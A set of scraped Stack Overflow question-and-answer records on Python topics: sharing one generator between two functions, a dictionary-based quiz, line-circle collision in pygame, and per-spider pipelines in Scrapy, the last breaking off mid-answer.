Aggregated value=6
Two functions, One generator
I have two functions which both take iterators as inputs. Is there a way to write a generator which I can supply to both functions as input, which would not require a reset or a second pass through? I want to do one pass over the data, but supply the output to two functions: Example: def my_generator(data): for row in data: yield row gen = my_generator(data) func1(gen) func2(gen) I know I could have two different generator instances, or reset in between functions, but was wondering if there is a way to avoid doing two passes on the data. Note that func1/func2 themselves are NOT generators, which would be nice cause I could then have a pipeline. The point here is to try and avoid a second pass over the data.
[ "Python has an amazing catalog of handy functions. You find the ones related to iterators in itertools:\nimport itertools\n\ndef my_generator(data):\n for row in data:\n yield row\n\ngen = my_generator(data)\ngen1, gen2 = itertools.tee(gen)\nfunc1(gen1)\nfunc2(gen2)\n\nHowever, this only makes sense if func1 and func2 don't consume all the elements, because if they do itertools.tee()has to remember all the elements in genuntil gen2 is used.\nTo get around this, use only a few elements at a time. Or change func1 to call func2. Or maybe even change func1 to be a lazy generator which returns the input and just pipe that into func2.\n", "You can either cache generators result into a list, or reset the generator to pass data into func2. The problem is that if one have 2 loops, one needs to iterate over the data twice, so either one loads the data again and create a generator or one caches the entire result. \nSolutions like itertools.tee will also just create 2 iteratvies, which is basically the same as resetting the generator after first iteration. Of course it is syntactic sugar but it won't change the situation in the background. \nIf you have big data here, you have to merge func1 and func2. \nfor a in gen:\n f1(a)\n f2(a)\n\nIn practice it can be a good idea to design code like this, so one has full control over iteration process and is able associate/compose maps and filters using a single iterative. \n", "If using threads is an option, the generator may be consumed just once without having to store a possibly unpredictable number of yielded values between calls to the consumers. The following example runs the consumers in lock-step; Python 3.2 or later is needed for this implementation:\nimport threading\n\n\ndef generator():\n for x in range(10):\n print('generating {}'.format(x))\n yield x\n\n\ndef tee(iterable, n=2):\n barrier = threading.Barrier(n)\n state = dict(value=None, stop_iteration=False)\n\n def repeat():\n while True:\n if barrier.wait() == 0:\n try:\n state.update(value=next(iterable))\n except StopIteration:\n state.update(stop_iteration=True)\n barrier.wait()\n if state['stop_iteration']:\n break\n yield state['value']\n\n return tuple(repeat() for i in range(n))\n\n\ndef func1(iterable):\n for x in iterable:\n print('func1 consuming {}'.format(x))\n\n\ndef func2(iterable):\n for x in iterable:\n print('func2 consuming {}'.format(x))\n\n\ngen1, gen2 = tee(generator(), 2)\n\nthread1 = threading.Thread(target=func1, args=(gen1,))\nthread1.start()\n\nthread2 = threading.Thread(target=func2, args=(gen2,))\nthread2.start()\n\nthread1.join()\nthread2.join()\n\n", "It is a little bit too late, but maybe will be helpful for someone. For simplicity I have added only one ChildClass, but the idea is to have multiple of them:\nclass BaseClass:\n def on_yield(self, value: int):\n raise NotImplementedError()\n def summary(self):\n raise NotImplementedError()\n\nclass ChildClass(BaseClass):\n def __init__(self):\n self._aggregated_value = 0\n def on_yield(self, value: int):\n self._aggregated_value += value\n def summary(self):\n print(f\"Aggregated value={self._aggregated_value}\")\n\nclass Generator():\n def my_generator(self, data):\n for row in data:\n yield row\n def calculate(self, generator, classes):\n for index, value in enumerate(generator):\n print(f\"index={index}\")\n [_class.on_yield(value) for _class in classes]\n [_class.summary() for _class in classes]\n\nif __name__ == '__main__':\n child_classes = [ ChildClass(), ChildClass() ]\n generator = Generator()\n my_generator = generator.my_generator([1, 2, 3])\n generator.calculate(my_generator, child_classes)\n\nThe output of this is:\nindex=0\nindex=1\nindex=2\nAggregated value=6\nAggregated value=6\n\n" ]
[ 3, 3, 3, 0 ]
[]
[]
[ "python" ]
stackoverflow_0035395429_python.txt
Q: what chages to make to get the question from dictionary what changes to make to get the question form dictionary and then get the answer at the same time and check weather it is right or wrong from random import * print("""Welcom to the quiz game would you like to play? """) consent = input("-----> ") consent = consent.lower() if consent == "no": print("The game ends") quit() else: print("Be redy to play") print("Answer the question in true and false") points = 0 questions = ["Banana is a vegetable","Two plus two equals to four","Mumbai is the capital of present India","Tiger is an example of bird","punjab is a country"] store = [] for ii in range(5): q1 = choice(questions) # q1.append(store) print(q1) ans1 = input("(True/False)----> ") ans1.lower() if q1 == questions[0] and ans1 == "false": points += 1 if q1 == questions[1] and ans1 == "true": points += 1 if q1 == questions[2] and ans1 == "false": points += 1 if q1 == questions[3] and ans1 == "false": points += 1 if q1 == questions[4] and ans1 == "false": points += 1 print(f"your points are {points}") tell some changes on this code to get that question from dictionarty and same answer at the runtime A: Make a dictionary where the key is a question and the value is the answer: quiz = { 'This is a true question': 'true', 'This is a false question': 'false', # and so on } Then choose a random question from the dictionary like this: question = choice(list(quiz)) print(question) And the correct answer will be quiz[question]. answer = input("type the answer: ").lower() if answer == quiz[question]: print("that is correct") else: print("wrong answer")
what chages to make to get the question from dictionary
what changes to make to get the question form dictionary and then get the answer at the same time and check weather it is right or wrong from random import * print("""Welcom to the quiz game would you like to play? """) consent = input("-----> ") consent = consent.lower() if consent == "no": print("The game ends") quit() else: print("Be redy to play") print("Answer the question in true and false") points = 0 questions = ["Banana is a vegetable","Two plus two equals to four","Mumbai is the capital of present India","Tiger is an example of bird","punjab is a country"] store = [] for ii in range(5): q1 = choice(questions) # q1.append(store) print(q1) ans1 = input("(True/False)----> ") ans1.lower() if q1 == questions[0] and ans1 == "false": points += 1 if q1 == questions[1] and ans1 == "true": points += 1 if q1 == questions[2] and ans1 == "false": points += 1 if q1 == questions[3] and ans1 == "false": points += 1 if q1 == questions[4] and ans1 == "false": points += 1 print(f"your points are {points}") tell some changes on this code to get that question from dictionarty and same answer at the runtime
[ "Make a dictionary where the key is a question and the value is the answer:\nquiz = {\n 'This is a true question': 'true',\n 'This is a false question': 'false',\n # and so on\n}\n\nThen choose a random question from the dictionary like this:\nquestion = choice(list(quiz))\nprint(question)\n\nAnd the correct answer will be quiz[question].\nanswer = input(\"type the answer: \").lower()\nif answer == quiz[question]:\n print(\"that is correct\")\nelse:\n print(\"wrong answer\")\n\n" ]
[ 0 ]
[]
[]
[ "python" ]
stackoverflow_0074593096_python.txt
Q: line collision detector with circles not long ago I am in python and I decided to make a path planning program, the truth cost me a lot since I am a beginner, but good to the point, is to generate circles of random size and position that do not collide with each other and then generate lines that do not collide with the circles, with much help and I managed to generate the circles without colliding but I can not generate the lines and much less that do not collide, I would greatly appreciate if you could help me and tell me what is wrong or missing this is my code main: import pygame as pg from Circulo import Circulo from Linea import Linea from random import * class CreaCir: def __init__(self, figs): self.figs = figs def update(self): if len(self.figs) <70: choca = False r = randint(5, 104) x = randint(0, 600 + r) y = randint(0, 400 + r) creOne = Circulo(x, y, r) for fig in (self.figs): choca = creOne.colisionC(fig) if choca == True: break if choca == False: self.figs.append(creOne) def dibujar(self, ventana): pass class CreaLin: def __init__(self, lins): self.lins = lins def update(self): if len(self.lins) <70: choca = False x = randint(0, 700) y = randint(0, 500) a = randint(0, 700) b = randint(0, 500) linOne = Linea(x, y, a, b) for lin in (self.lins): choca = linOne.colisionL(lin) if choca == True: break if choca == False: self.lins.append(linOne) def dibujar(self, ventana): pass class Ventana: def __init__(self, Ven_Tam= (700, 500)): pg.init() self.ven_tam = Ven_Tam self.ven = pg.display.set_caption("Linea") self.ven = pg.display.set_mode(self.ven_tam) self.ven.fill(pg.Color('#404040')) self.figs = [] self.lins = [] self.reloj = pg.time.Clock() def check_events(self): for event in pg.event.get(): if event.type == pg.QUIT or (event.type == pg.KEYDOWN and event.key == pg.K_ESCAPE): quit() pg.display.flip() def run(self): cirCreater = CreaCir(self.figs) linCreater = CreaLin(self.lins) while True: self.check_events() cirCreater.update() linCreater.update() for fig in self.figs: fig.dibujar(self.ven) for lin in self.lins: lin.dibujar(self.ven) self.reloj.tick(60) if __name__ == '__main__': ven = Ventana() ven.run() class Circulo: class Circulo(PosGeo): def __init__(self, x, y, r): self.x = x self.y = y self.radio = r self.cx = x+r self.cy = y+r def __str__(self): return f"Circulo, (X: {self.x}, Y: {self.y}), radio: {self.radio}" def dibujar(self, ventana): pg.draw.circle(ventana, "white", (self.cx, self.cy), self.radio, 1) pg.draw.line(ventana, "white", (self.cx+2, self.cy+2),(self.cx-2, self.cy-2)) pg.draw.line(ventana, "white", (self.cx-2, self.cy+2),(self.cx+2, self.cy-2)) def update(self): pass def colisionC(self, c2): return self.radio + c2.radio > sqrt(pow(self.cx - c2.cx, 2) + pow(self.cy - c2.cy, 2)) def colisionL(self, l1): den = sqrt(l1.a*l1.a+l1.b*l1.b) return abs(l1.a*self.cx+l1.b*self.cy+l1.c)/den < self.radio and finally my class line: class Linea(PosGeo): def __init__(self, x, y, a, b): super().__init__(x, y) self.x = x self.y = y self.a = a self.b = b def dibujar(self, ventana): pg.draw.line(ventana, "#7B0000", (self.x, self.y), (self.a, self.b)) def update(self): pass def colisionL(self, l1): pass A: Your algorithm that detects the intersection of a line and a circle is wrong.A correct algorithm can be found all over the web. e.g. Circle-Line Intersection. A function that implements such an algorithm and finds the intersection points of a line and a circle could look like the following: def sign(x): return -1 if x < 0 else 1 def interectLineCircle(l1, l2, cpt, r): x1 = l1[0] - cpt[0] y1 = l1[1] - cpt[1] x2 = l2[0] - cpt[0] y2 = l2[1] - cpt[1] dx = x2 - x1 dy = y2 - y1 dr = math.sqrt(dx*dx + dy*dy) D = x1 * y2 - x2 * y1 discriminant = r*r*dr*dr - D*D if discriminant < 0: return [] if discriminant == 0: return [((D * dy ) / (dr * dr) + cpt[0], (-D * dx ) / (dr * dr) + cpt[1])] xa = (D * dy + sign(dy) * dx * math.sqrt(discriminant)) / (dr * dr) xb = (D * dy - sign(dy) * dx * math.sqrt(discriminant)) / (dr * dr) ya = (-D * dx + abs(dy) * math.sqrt(discriminant)) / (dr * dr) yb = (-D * dx - abs(dy) * math.sqrt(discriminant)) / (dr * dr) return [(xa + cpt[0], ya + cpt[1]), (xb + cpt[0], yb + cpt[1])] If you just want to check if the line and the circle intersect, but you don't need the intersection points, you can simply return discriminant > 0: def interectLineCircle(l1, l2, cpt, r): x1 = l1[0] - cpt[0] y1 = l1[1] - cpt[1] x2 = l2[0] - cpt[0] y2 = l2[1] - cpt[1] dx = x2 - x1 dy = y2 - y1 dr = math.sqrt(dx*dx + dy*dy) D = x1 * y2 - x2 * y1 discriminant = r*r*dr*dr - D*D return discriminant > 0 If you want to check for line segments instead of endless lines, you must also check whether the intersection points are on the line segment: def interectLineCircle(l1, l2, cpt, r): x1 = l1[0] - cpt[0] y1 = l1[1] - cpt[1] x2 = l2[0] - cpt[0] y2 = l2[1] - cpt[1] dx = x2 - x1 dy = y2 - y1 dr = math.sqrt(dx*dx + dy*dy) D = x1 * y2 - x2 * y1 discriminant = r*r*dr*dr - D*D if discriminant < 0: return [] if discriminant == 0: xa = (D * dy ) / (dr * dr) ya = (-D * dx ) / (dr * dr) ta = (xa-x1)*dx/dr + (ya-y1)*dy/dr return [(xa + cpt[0], ya + cpt[1])] if 0 < ta < dr else [] xa = (D * dy + sign(dy) * dx * math.sqrt(discriminant)) / (dr * dr) ya = (-D * dx + abs(dy) * math.sqrt(discriminant)) / (dr * dr) ta = (xa-x1)*dx/dr + (ya-y1)*dy/dr xpt = [(xa + cpt[0], ya + cpt[1])] if 0 < ta < dr else [] xb = (D * dy - sign(dy) * dx * math.sqrt(discriminant)) / (dr * dr) yb = (-D * dx - abs(dy) * math.sqrt(discriminant)) / (dr * dr) tb = (xb-x1)*dx/dr + (yb-y1)*dy/dr xpt += [(xb + cpt[0], yb + cpt[1])] if 0 < tb < dr else [] return xpt Complete example: import pygame, math window = pygame.display.set_mode((500, 300)) l1 = [50, 0] l2 = [450, 300] r = 50 def sign(x): return -1 if x < 0 else 1 def interectLineCircle(l1, l2, cpt, r): x1 = l1[0] - cpt[0] y1 = l1[1] - cpt[1] x2 = l2[0] - cpt[0] y2 = l2[1] - cpt[1] dx = x2 - x1 dy = y2 - y1 dr = math.sqrt(dx*dx + dy*dy) D = x1 * y2 - x2 * y1 discriminant = r*r*dr*dr - D*D if discriminant < 0: return [] if discriminant == 0: return [((D * dy ) / (dr * dr) + cpt[0], (-D * dx ) / (dr * dr) + cpt[1])] xa = (D * dy + sign(dy) * dx * math.sqrt(discriminant)) / (dr * dr) xb = (D * dy - sign(dy) * dx * math.sqrt(discriminant)) / (dr * dr) ya = (-D * dx + abs(dy) * math.sqrt(discriminant)) / (dr * dr) yb = (-D * dx - abs(dy) * math.sqrt(discriminant)) / (dr * dr) return [(xa + cpt[0], ya + cpt[1]), (xb + cpt[0], yb + cpt[1])] clock = pygame.time.Clock() run = True while run: clock.tick(250) for event in pygame.event.get(): if event.type == pygame.QUIT: run = False cpt = pygame.mouse.get_pos() isect = interectLineCircle(l1, l2, cpt, r) window.fill("black") pygame.draw.line(window, "white", l1, l2, 3) pygame.draw.circle(window, "white", cpt, r, 3) for p in isect: pygame.draw.circle(window, "red", p, 5) pygame.display.flip() pygame.quit() exit()
line collision detector with circles
not long ago I am in python and I decided to make a path planning program, the truth cost me a lot since I am a beginner, but good to the point, is to generate circles of random size and position that do not collide with each other and then generate lines that do not collide with the circles, with much help and I managed to generate the circles without colliding but I can not generate the lines and much less that do not collide, I would greatly appreciate if you could help me and tell me what is wrong or missing this is my code main: import pygame as pg from Circulo import Circulo from Linea import Linea from random import * class CreaCir: def __init__(self, figs): self.figs = figs def update(self): if len(self.figs) <70: choca = False r = randint(5, 104) x = randint(0, 600 + r) y = randint(0, 400 + r) creOne = Circulo(x, y, r) for fig in (self.figs): choca = creOne.colisionC(fig) if choca == True: break if choca == False: self.figs.append(creOne) def dibujar(self, ventana): pass class CreaLin: def __init__(self, lins): self.lins = lins def update(self): if len(self.lins) <70: choca = False x = randint(0, 700) y = randint(0, 500) a = randint(0, 700) b = randint(0, 500) linOne = Linea(x, y, a, b) for lin in (self.lins): choca = linOne.colisionL(lin) if choca == True: break if choca == False: self.lins.append(linOne) def dibujar(self, ventana): pass class Ventana: def __init__(self, Ven_Tam= (700, 500)): pg.init() self.ven_tam = Ven_Tam self.ven = pg.display.set_caption("Linea") self.ven = pg.display.set_mode(self.ven_tam) self.ven.fill(pg.Color('#404040')) self.figs = [] self.lins = [] self.reloj = pg.time.Clock() def check_events(self): for event in pg.event.get(): if event.type == pg.QUIT or (event.type == pg.KEYDOWN and event.key == pg.K_ESCAPE): quit() pg.display.flip() def run(self): cirCreater = CreaCir(self.figs) linCreater = CreaLin(self.lins) while True: self.check_events() cirCreater.update() linCreater.update() for fig in self.figs: fig.dibujar(self.ven) for lin in self.lins: lin.dibujar(self.ven) self.reloj.tick(60) if __name__ == '__main__': ven = Ventana() ven.run() class Circulo: class Circulo(PosGeo): def __init__(self, x, y, r): self.x = x self.y = y self.radio = r self.cx = x+r self.cy = y+r def __str__(self): return f"Circulo, (X: {self.x}, Y: {self.y}), radio: {self.radio}" def dibujar(self, ventana): pg.draw.circle(ventana, "white", (self.cx, self.cy), self.radio, 1) pg.draw.line(ventana, "white", (self.cx+2, self.cy+2),(self.cx-2, self.cy-2)) pg.draw.line(ventana, "white", (self.cx-2, self.cy+2),(self.cx+2, self.cy-2)) def update(self): pass def colisionC(self, c2): return self.radio + c2.radio > sqrt(pow(self.cx - c2.cx, 2) + pow(self.cy - c2.cy, 2)) def colisionL(self, l1): den = sqrt(l1.a*l1.a+l1.b*l1.b) return abs(l1.a*self.cx+l1.b*self.cy+l1.c)/den < self.radio and finally my class line: class Linea(PosGeo): def __init__(self, x, y, a, b): super().__init__(x, y) self.x = x self.y = y self.a = a self.b = b def dibujar(self, ventana): pg.draw.line(ventana, "#7B0000", (self.x, self.y), (self.a, self.b)) def update(self): pass def colisionL(self, l1): pass
[ "Your algorithm that detects the intersection of a line and a circle is wrong.A correct algorithm can be found all over the web. e.g. Circle-Line Intersection. A function that implements such an algorithm and finds the intersection points of a line and a circle could look like the following:\ndef sign(x):\n return -1 if x < 0 else 1\n\ndef interectLineCircle(l1, l2, cpt, r):\n x1 = l1[0] - cpt[0]\n y1 = l1[1] - cpt[1]\n x2 = l2[0] - cpt[0]\n y2 = l2[1] - cpt[1]\n dx = x2 - x1\n dy = y2 - y1\n dr = math.sqrt(dx*dx + dy*dy)\n D = x1 * y2 - x2 * y1\n discriminant = r*r*dr*dr - D*D\n if discriminant < 0:\n return []\n if discriminant == 0:\n return [((D * dy ) / (dr * dr) + cpt[0], (-D * dx ) / (dr * dr) + cpt[1])]\n xa = (D * dy + sign(dy) * dx * math.sqrt(discriminant)) / (dr * dr)\n xb = (D * dy - sign(dy) * dx * math.sqrt(discriminant)) / (dr * dr)\n ya = (-D * dx + abs(dy) * math.sqrt(discriminant)) / (dr * dr)\n yb = (-D * dx - abs(dy) * math.sqrt(discriminant)) / (dr * dr)\n return [(xa + cpt[0], ya + cpt[1]), (xb + cpt[0], yb + cpt[1])]\n\nIf you just want to check if the line and the circle intersect, but you don't need the intersection points, you can simply return discriminant > 0:\ndef interectLineCircle(l1, l2, cpt, r):\n x1 = l1[0] - cpt[0]\n y1 = l1[1] - cpt[1]\n x2 = l2[0] - cpt[0]\n y2 = l2[1] - cpt[1]\n dx = x2 - x1\n dy = y2 - y1\n dr = math.sqrt(dx*dx + dy*dy)\n D = x1 * y2 - x2 * y1\n discriminant = r*r*dr*dr - D*D\n return discriminant > 0\n\nIf you want to check for line segments instead of endless lines, you must also check whether the intersection points are on the line segment:\ndef interectLineCircle(l1, l2, cpt, r):\n x1 = l1[0] - cpt[0]\n y1 = l1[1] - cpt[1]\n x2 = l2[0] - cpt[0]\n y2 = l2[1] - cpt[1]\n dx = x2 - x1\n dy = y2 - y1\n dr = math.sqrt(dx*dx + dy*dy)\n D = x1 * y2 - x2 * y1\n discriminant = r*r*dr*dr - D*D\n if discriminant < 0:\n return []\n if discriminant == 0:\n xa = (D * dy ) / (dr * dr)\n ya = (-D * dx ) / (dr * dr)\n ta = (xa-x1)*dx/dr + (ya-y1)*dy/dr\n return [(xa + cpt[0], ya + cpt[1])] if 0 < ta < dr else []\n \n xa = (D * dy + sign(dy) * dx * math.sqrt(discriminant)) / (dr * dr)\n ya = (-D * dx + abs(dy) * math.sqrt(discriminant)) / (dr * dr)\n ta = (xa-x1)*dx/dr + (ya-y1)*dy/dr\n xpt = [(xa + cpt[0], ya + cpt[1])] if 0 < ta < dr else []\n \n xb = (D * dy - sign(dy) * dx * math.sqrt(discriminant)) / (dr * dr) \n yb = (-D * dx - abs(dy) * math.sqrt(discriminant)) / (dr * dr)\n tb = (xb-x1)*dx/dr + (yb-y1)*dy/dr\n xpt += [(xb + cpt[0], yb + cpt[1])] if 0 < tb < dr else []\n return xpt\n\n\nComplete example:\n\nimport pygame, math\n\nwindow = pygame.display.set_mode((500, 300))\n\nl1 = [50, 0]\nl2 = [450, 300]\nr = 50\n\ndef sign(x):\n return -1 if x < 0 else 1\n\ndef interectLineCircle(l1, l2, cpt, r):\n x1 = l1[0] - cpt[0]\n y1 = l1[1] - cpt[1]\n x2 = l2[0] - cpt[0]\n y2 = l2[1] - cpt[1]\n dx = x2 - x1\n dy = y2 - y1\n dr = math.sqrt(dx*dx + dy*dy)\n D = x1 * y2 - x2 * y1\n discriminant = r*r*dr*dr - D*D\n if discriminant < 0:\n return []\n if discriminant == 0:\n return [((D * dy ) / (dr * dr) + cpt[0], (-D * dx ) / (dr * dr) + cpt[1])]\n xa = (D * dy + sign(dy) * dx * math.sqrt(discriminant)) / (dr * dr)\n xb = (D * dy - sign(dy) * dx * math.sqrt(discriminant)) / (dr * dr)\n ya = (-D * dx + abs(dy) * math.sqrt(discriminant)) / (dr * dr)\n yb = (-D * dx - abs(dy) * math.sqrt(discriminant)) / (dr * dr)\n return [(xa + cpt[0], ya + cpt[1]), (xb + cpt[0], yb + cpt[1])]\n\nclock = pygame.time.Clock()\nrun = True\nwhile run:\n clock.tick(250)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\n cpt = pygame.mouse.get_pos()\n isect = interectLineCircle(l1, l2, cpt, r)\n \n window.fill(\"black\")\n pygame.draw.line(window, \"white\", l1, l2, 3)\n pygame.draw.circle(window, \"white\", cpt, r, 3)\n for p in isect:\n pygame.draw.circle(window, \"red\", p, 5)\n pygame.display.flip()\n\npygame.quit()\nexit()\n\n" ]
[ 1 ]
[]
[]
[ "pygame", "python" ]
stackoverflow_0074592905_pygame_python.txt
Q: How can I use different pipelines for different spiders in a single Scrapy project I have a scrapy project which contains multiple spiders. Is there any way I can define which pipelines to use for which spider? Not all the pipelines i have defined are applicable for every spider. Thanks A: Just remove all pipelines from main settings and use this inside spider. This will define the pipeline to user per spider class testSpider(InitSpider): name = 'test' custom_settings = { 'ITEM_PIPELINES': { 'app.MyPipeline': 400 } } A: Building on the solution from Pablo Hoffman, you can use the following decorator on the process_item method of a Pipeline object so that it checks the pipeline attribute of your spider for whether or not it should be executed. For example: def check_spider_pipeline(process_item_method): @functools.wraps(process_item_method) def wrapper(self, item, spider): # message template for debugging msg = '%%s %s pipeline step' % (self.__class__.__name__,) # if class is in the spider's pipeline, then use the # process_item method normally. if self.__class__ in spider.pipeline: spider.log(msg % 'executing', level=log.DEBUG) return process_item_method(self, item, spider) # otherwise, just return the untouched item (skip this step in # the pipeline) else: spider.log(msg % 'skipping', level=log.DEBUG) return item return wrapper For this decorator to work correctly, the spider must have a pipeline attribute with a container of the Pipeline objects that you want to use to process the item, for example: class MySpider(BaseSpider): pipeline = set([ pipelines.Save, pipelines.Validate, ]) def parse(self, response): # insert scrapy goodness here return item And then in a pipelines.py file: class Save(object): @check_spider_pipeline def process_item(self, item, spider): # do saving here return item class Validate(object): @check_spider_pipeline def process_item(self, item, spider): # do validating here return item All Pipeline objects should still be defined in ITEM_PIPELINES in settings (in the correct order -- would be nice to change so that the order could be specified on the Spider, too). A: The other solutions given here are good, but I think they could be slow, because we are not really not using the pipeline per spider, instead we are checking if a pipeline exists every time an item is returned (and in some cases this could reach millions). A good way to completely disable (or enable) a feature per spider is using custom_setting and from_crawler for all extensions like this: pipelines.py from scrapy.exceptions import NotConfigured class SomePipeline(object): def __init__(self): pass @classmethod def from_crawler(cls, crawler): if not crawler.settings.getbool('SOMEPIPELINE_ENABLED'): # if this isn't specified in settings, the pipeline will be completely disabled raise NotConfigured return cls() def process_item(self, item, spider): # change my item return item settings.py ITEM_PIPELINES = { 'myproject.pipelines.SomePipeline': 300, } SOMEPIPELINE_ENABLED = True # you could have the pipeline enabled by default spider1.py class Spider1(Spider): name = 'spider1' start_urls = ["http://example.com"] custom_settings = { 'SOMEPIPELINE_ENABLED': False } As you check, we have specified custom_settings that will override the things specified in settings.py, and we are disabling SOMEPIPELINE_ENABLED for this spider. Now when you run this spider, check for something like: [scrapy] INFO: Enabled item pipelines: [] Now scrapy has completely disabled the pipeline, not bothering of its existence for the whole run. Check that this also works for scrapy extensions and middlewares. A: You can use the name attribute of the spider in your pipeline class CustomPipeline(object) def process_item(self, item, spider) if spider.name == 'spider1': # do something return item return item Defining all pipelines this way can accomplish what you want. A: I can think of at least four approaches: Use a different scrapy project per set of spiders+pipelines (might be appropriate if your spiders are different enough warrant being in different projects) On the scrapy tool command line, change the pipeline setting with scrapy settings in between each invocation of your spider Isolate your spiders into their own scrapy tool commands, and define the default_settings['ITEM_PIPELINES'] on your command class to the pipeline list you want for that command. See line 6 of this example. In the pipeline classes themselves, have process_item() check what spider it's running against, and do nothing if it should be ignored for that spider. See the example using resources per spider to get you started. (This seems like an ugly solution because it tightly couples spiders and item pipelines. You probably shouldn't use this one.) A: The most simple and effective solution is to set custom settings in each spider itself. custom_settings = {'ITEM_PIPELINES': {'project_name.pipelines.SecondPipeline': 300}} After that you need to set them in the settings.py file ITEM_PIPELINES = { 'project_name.pipelines.FistPipeline': 300, 'project_name.pipelines.SecondPipeline': 400 } in that way each spider will use the respective pipeline. A: You can just set the item pipelines settings inside of the spider like this: class CustomSpider(Spider): name = 'custom_spider' custom_settings = { 'ITEM_PIPELINES': { '__main__.PagePipeline': 400, '__main__.ProductPipeline': 300, }, 'CONCURRENT_REQUESTS_PER_DOMAIN': 2 } I can then split up a pipeline (or even use multiple pipelines) by adding a value to the loader/returned item that identifies which part of the spider sent items over. This way I won’t get any KeyError exceptions and I know which items should be available. ... def scrape_stuff(self, response): pageloader = PageLoader( PageItem(), response=response) pageloader.add_xpath('entire_page', '/html//text()') pageloader.add_value('item_type', 'page') yield pageloader.load_item() productloader = ProductLoader( ProductItem(), response=response) productloader.add_xpath('product_name', '//span[contains(text(), "Example")]') productloader.add_value('item_type', 'product') yield productloader.load_item() class PagePipeline: def process_item(self, item, spider): if item['item_type'] == 'product': # do product stuff if item['item_type'] == 'page': # do page stuff A: I am using two pipelines, one for image download (MyImagesPipeline) and second for save data in mongodb (MongoPipeline). suppose we have many spiders(spider1,spider2,...........),in my example spider1 and spider5 can not use MyImagesPipeline settings.py ITEM_PIPELINES = {'scrapycrawler.pipelines.MyImagesPipeline' : 1,'scrapycrawler.pipelines.MongoPipeline' : 2} IMAGES_STORE = '/var/www/scrapycrawler/dowload' And bellow complete code of pipeline import scrapy import string import pymongo from scrapy.pipelines.images import ImagesPipeline class MyImagesPipeline(ImagesPipeline): def process_item(self, item, spider): if spider.name not in ['spider1', 'spider5']: return super(ImagesPipeline, self).process_item(item, spider) else: return item def file_path(self, request, response=None, info=None): image_name = string.split(request.url, '/')[-1] dir1 = image_name[0] dir2 = image_name[1] return dir1 + '/' + dir2 + '/' +image_name class MongoPipeline(object): collection_name = 'scrapy_items' collection_url='snapdeal_urls' def __init__(self, mongo_uri, mongo_db): self.mongo_uri = mongo_uri self.mongo_db = mongo_db @classmethod def from_crawler(cls, crawler): return cls( mongo_uri=crawler.settings.get('MONGO_URI'), mongo_db=crawler.settings.get('MONGO_DATABASE', 'scraping') ) def open_spider(self, spider): self.client = pymongo.MongoClient(self.mongo_uri) self.db = self.client[self.mongo_db] def close_spider(self, spider): self.client.close() def process_item(self, item, spider): #self.db[self.collection_name].insert(dict(item)) collection_name=item.get( 'collection_name', self.collection_name ) self.db[collection_name].insert(dict(item)) data = {} data['base_id'] = item['base_id'] self.db[self.collection_url].update({ 'base_id': item['base_id'] }, { '$set': { 'image_download': 1 } }, upsert=False, multi=True) return item A: we can use some conditions in pipeline as this # -*- coding: utf-8 -*- from scrapy_app.items import x class SaveItemPipeline(object): def process_item(self, item, spider): if isinstance(item, x,): item.save() return item A: Simple but still useful solution. Spider code def parse(self, response): item = {} ... do parse stuff item['info'] = {'spider': 'Spider2'} pipeline code def process_item(self, item, spider): if item['info']['spider'] == 'Spider1': logging.error('Spider1 pipeline works') elif item['info']['spider'] == 'Spider2': logging.error('Spider2 pipeline works') elif item['info']['spider'] == 'Spider3': logging.error('Spider3 pipeline works') Hope this save some time for somebody! A: Overriding 'ITEM_PIPELINES' with custom settings per spider, as others have suggested, works well. However, I found I had a few distinct groups of pipelines I wanted to use for different categories of spiders. I wanted to be able to easily define the pipeline for a particular category of spider without a lot of thought, and I wanted to be able to update a pipeline category without editing each spider in that category individually. So I created a new file called pipeline_definitions.py in the same directory as settings.py. pipeline_definitions.py contains functions like this: def episode_pipelines(): return { 'radio_scrape.pipelines.SaveEpisode': 100, } def show_pipelines(): return { 'radio_scrape.pipelines.SaveShow': 100, } Then in each spider I would import the specific function relevant for the spider: from radio_scrape.pipeline_definitions import episode_pipelines I then use that function in the custom settings assignment: class RadioStationAEspisodesSpider(scrapy.Spider): name = 'radio_station_A_episodes' custom_settings = { 'ITEM_PIPELINES': episode_pipelines() }
How can I use different pipelines for different spiders in a single Scrapy project
I have a scrapy project which contains multiple spiders. Is there any way I can define which pipelines to use for which spider? Not all the pipelines i have defined are applicable for every spider. Thanks
[ "Just remove all pipelines from main settings and use this inside spider.\nThis will define the pipeline to user per spider\nclass testSpider(InitSpider):\n name = 'test'\n custom_settings = {\n 'ITEM_PIPELINES': {\n 'app.MyPipeline': 400\n }\n }\n\n", "Building on the solution from Pablo Hoffman, you can use the following decorator on the process_item method of a Pipeline object so that it checks the pipeline attribute of your spider for whether or not it should be executed. For example:\ndef check_spider_pipeline(process_item_method):\n\n @functools.wraps(process_item_method)\n def wrapper(self, item, spider):\n\n # message template for debugging\n msg = '%%s %s pipeline step' % (self.__class__.__name__,)\n\n # if class is in the spider's pipeline, then use the\n # process_item method normally.\n if self.__class__ in spider.pipeline:\n spider.log(msg % 'executing', level=log.DEBUG)\n return process_item_method(self, item, spider)\n\n # otherwise, just return the untouched item (skip this step in\n # the pipeline)\n else:\n spider.log(msg % 'skipping', level=log.DEBUG)\n return item\n\n return wrapper\n\nFor this decorator to work correctly, the spider must have a pipeline attribute with a container of the Pipeline objects that you want to use to process the item, for example:\nclass MySpider(BaseSpider):\n\n pipeline = set([\n pipelines.Save,\n pipelines.Validate,\n ])\n\n def parse(self, response):\n # insert scrapy goodness here\n return item\n\nAnd then in a pipelines.py file:\nclass Save(object):\n\n @check_spider_pipeline\n def process_item(self, item, spider):\n # do saving here\n return item\n\nclass Validate(object):\n\n @check_spider_pipeline\n def process_item(self, item, spider):\n # do validating here\n return item\n\nAll Pipeline objects should still be defined in ITEM_PIPELINES in settings (in the correct order -- would be nice to change so that the order could be specified on the Spider, too).\n", "The other solutions given here are good, but I think they could be slow, because we are not really not using the pipeline per spider, instead we are checking if a pipeline exists every time an item is returned (and in some cases this could reach millions).\nA good way to completely disable (or enable) a feature per spider is using custom_setting and from_crawler for all extensions like this:\npipelines.py\nfrom scrapy.exceptions import NotConfigured\n\nclass SomePipeline(object):\n def __init__(self):\n pass\n\n @classmethod\n def from_crawler(cls, crawler):\n if not crawler.settings.getbool('SOMEPIPELINE_ENABLED'):\n # if this isn't specified in settings, the pipeline will be completely disabled\n raise NotConfigured\n return cls()\n\n def process_item(self, item, spider):\n # change my item\n return item\n\nsettings.py\nITEM_PIPELINES = {\n 'myproject.pipelines.SomePipeline': 300,\n}\nSOMEPIPELINE_ENABLED = True # you could have the pipeline enabled by 